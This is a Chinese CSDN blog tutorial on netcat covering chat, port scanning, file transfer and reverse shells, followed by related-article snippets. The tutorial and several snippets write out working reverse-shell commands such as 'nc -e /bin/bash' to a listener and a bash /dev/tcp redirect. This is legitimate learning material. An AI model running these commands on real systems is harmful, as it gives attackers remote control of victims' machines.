nc的使用+反弹shell

最新推荐文章于 2024-07-24 21:24:56 发布
最新推荐文章于 2024-07-24 21:24:56 发布
阅读量852 收藏 4
点赞数 6
文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80366980/article/details/136152096
版权
本文介绍了Linux中的nc工具,包括其基本功能如终端对话、端口扫描和文件传输,以及如何利用nc实现反弹shell,尤其是在正向连接受限的情况下的权限提升策略。
摘要由CSDN通过智能技术生成

文章目录

前言

记录学习linux中nc的使用,以及反弹shell

仅供个人学习,如有冒犯请尽快联系

一、nc是什么?

nc是netcat的简写,因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具,有着网络界的瑞士军刀美誉。

二、nc的使用

1. 仿真聊天
2. 端口连通性测试
3. 测试tcp端口的连通性
4. 文件及目录的传输

nc的控制参数不少,常用的几个参数:

  1. -l 使用监听模式,管理传入的信息
  2. -p <通信端口>,设置本地主机使用的通信端口
  3. -s 指定发送数据的源IP地址,适用于多网卡机
  4. -u 指定nc使用UDP协议,默认为TCP
  5. -v 输出交互或出错信息,新手调试时尤为有用
  6. -w 超时秒数,后面跟数字
  7. -z 表示zero,表示扫描时不发送任何数据,只在扫描通信端口时使用
  8. -k 永久占用某端口。RHEL7 or later只支持TCP端口的永久占用

1.终端间对话

仿真聊天

在这里插入图片描述

使用ctrl+C(或D)退出

2.端口扫描

在这里插入图片描述

nc -v -u -z www.baidu.com 514可以扫描端口,当然,端口可以修改

3.传输文件

接收端

nc -l -v 端口号>要写入的文件名(跟被传输文件名可以不一样)
nc -l -v 5555 > 2.txt

发送端

nc -v 接收端的ip 端口号<被传输文件名
nc -v 192.168.27.128 9999 < 1.txt

在这里插入图片描述

三、利用nc反弹shell

1.为何需要反弹shell

当正向连接不可达时:

  • 客户机中了木马,但是在局域网内,无法正向连接。
  • 由于防火墙和局域网的限制,对方只能发送请求,不可主动接受请求

2.反弹shell原理

反弹shell是指控制端监听某个TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出传递到控制端的过程。
reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。

3.用bash反弹shell

攻击端

nc -lvp 5555

被攻击端

nc -e /bin/bash 192.168.27.128 5555

在这里插入图片描述

荆棘鸟lm
关注
  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[ 隧道技术 ] 反弹shell的集中常见方式(一)nc反弹shell
qq_51577576的博客
08-03 1707
攻击者机器 192.168.3.27 和靶机 192.168.3.29 可以相互的访问,这个时候可以使用正向shell攻击者机器 192.168.3.27 不能直接访问靶机,但是靶机 192.168.3.29 可以访问攻击者的机器,这个时候使用反向shell。...
NC反弹Shell
qq_23066945的博客
11-23 617
NC反弹Shell 实验环境 Kali Ubuntu(开启telnet) 一、Msf登录设置 1、保证kali使用telnet能够登陆Ubuntu(假设通过爆破,弱口令成功登录telnet) 使用telnet登录模块 设置目标ip(Ubuntu),用户名,密码(可以指定密码文件)run运行 可以看到,成功登录telnet,记录会话 选择第一个会话进行连接 然后下载事先准备好的文件123...
反弹Shell方法论,Windows篇
大河之犬的博客
10-10 821
使用它你可以轻易的建立任何连接。要创建Powershell反向Shell,黑客需要在目标系统上运行一个恶意的Powershell脚本,该脚本将与攻击者的服务器建立连接。Powershell反向Shell是一种常用的攻击技术,用于在目标系统上建立与攻击者控制的远程服务器之间的连接。Perl反向Shell是一种利用Perl编写的恶意脚本,用于建立与目标系统的反向连接。在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。
LinuxNC反弹shell命令(推荐)
09-15
主要介绍了LinuxNC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
【渗透测试笔记】之【内网渗透——传输层隧道(nc使用nc的正反向shell、bash
2401_84969915的博客
05-13 855
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
nc--反弹shell
wzhua的博客
08-04 2280
nc--反弹shell,小实验
NC(瑞士军刀)反弹shell使用教程,实操演示,保姆级教学
2301_79015613的博客
03-14 1440
简介:nc瑞士军刀,通常被称为netcat或简称nc,是一个被誉为网络安全界的“瑞士军刀”的实用工具。它利用TCP或UDP协议的网络连接来读写数据,具有多种强大的功能,使用也相对简单,只需两台装有nc的PC,就可以进行各种网络操作。例如,通过监听特定端口,可以实现电子取证PC与电子取证设备之间的通信和数据同步。下面是nc的常用参数。
反弹shell的方式——之NC反弹shell
最新发布
aihua002的博客
07-24 349
反弹shell是指在攻击机监听某个端口,然后通过目标连接攻击机监听的端口,在攻击机反弹得到目标机的shell。通常在目标网络有防火墙或者其他因素限制,导致无法持续控制目标,或者执行命令受阻等情况时需要进行反弹shell
NC反弹shell的几种方法
qq_59350385的博客
05-12 9692
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash
linux使用nc 反弹shell
qq_30890029的博客
04-20 470
但某些版本的nc没有-e参数(非传统版),则可使用以下方式解决。本机【攻击机】开启nc监听:nc -lvnp 9999。受害机器反弹shell《两种常见反弹shell
nc.exe(nc反弹)
04-07
netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑’编译后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法,有此功能的原版NC好象要60KB:P),虽然“体积”小,但很完成很多工作。
详解NC反弹shell的几种方法
01-08
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash反弹 bash -i >& /dev/tcp/ip/port 0>&1 但首先需要在kali上使用
利用nc反弹cmdshell提权
01-27
利用nc反弹cmdshell提权 利用nc反弹cmdshell提权 利用nc反弹cmdshell提权
nc反弹cmd.zip
08-04
nc反弹cmd.zip
NC反弹CMDSHELL提权总结
weixin_34404393的博客
03-15 557
Server-U等都不可以用的情况下.   一般都可思考用此方法不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口…   那么这种方法也失效了…. 1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)web目录都是有写有读的权限,我们直接传NC进去   2:然后本地执行nc -vv -lp 52进行反弹   ...
内网渗透:nc反弹shell总结
安全大白
01-03 6485
1、实验环境 Kali:192.168.32.132 //模拟靶机 Windows:192.168.32.1 //模拟公网vps 2、若靶机上存在nc,获取反向shell: vps攻击机:nc -lvp 9999 // 监听9999端口 靶机:nc 1.1.1.1 9999 -e /bin/bash // Linux正向连接公网vps1.1.1.1的9999端口 nc 1.1.1.1 9999 -e c:\windows\system32\cmd.exe // Windows 3、若
nc反弹shell使用
qq_42307546的博客
03-29 2074
交互shell就是shell等待你的输入,并且立即执行你提交的命令。 这种模式被称作交互式是shell与用户进行交互,用户输入退出命令才会终止 例如 cmd终端 msf反弹 非交互shell也可以运行在另一种模式,非交互模式,这种模式是直接读取存放在文件中的命令并且运行,当他读取到文件末尾就会终止 例如:webshell,这种执行完命令之后就会终止掉了 使用反弹shell可以让目标服务器主动连接攻击者,绕过防火墙的拦截,因为防火墙只会拦截外部访问内部的流量并不会主动拦截内部发出的流量 利用nc反弹shell
反弹shell初识
无痕的博客
11-01 4038
反弹shell的指令与演示
NC 反弹shell
08-30
NC反弹shell是一种利用NetCat工具实现的一种技术,用于在目标机器和控制机器之间建立一个反向连接,并获得对目标机器的控制权。在反弹shell中,目标机器先执行NC命令,将shell连接到控制机器上的NC监听端口,从而使控制机器能够控制目标机器。 有几种方法可以实现NC反弹shell。其中一种是使用bash反弹,命令如下: ``` bash -i &>/dev/tcp/ip/port 0>&1 ``` 请注意,这种方法需要在控制机器上执行。 另一种方法是使用NC命令进行反向连接,命令如下: ``` nc -e /bin/bash 192.168.0.4 7777 ``` 这种方法适用于在CentOS或Ubuntu上使用。 还有一种方法是使用php反弹shell,需要目标机器安装NC。命令如下: ``` bash -i &>/dev/tcp/ip/port 0>&1 ``` 同样,这种方法需要在控制机器上执行。 总而言之,NC反弹shell是一种通过建立反向连接实现对目标机器的控制的技术。可以使用不同的方法来实现反弹shell,如bash反弹和php反弹。这些方法需要根据具体情况和系统进行选择和执行。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [详解NC反弹shell的几种方法](https://download.csdn.net/download/weixin_38664159/14048091)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [NC反弹shell的几种方法](https://blog.csdn.net/qq_59350385/article/details/124733038)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值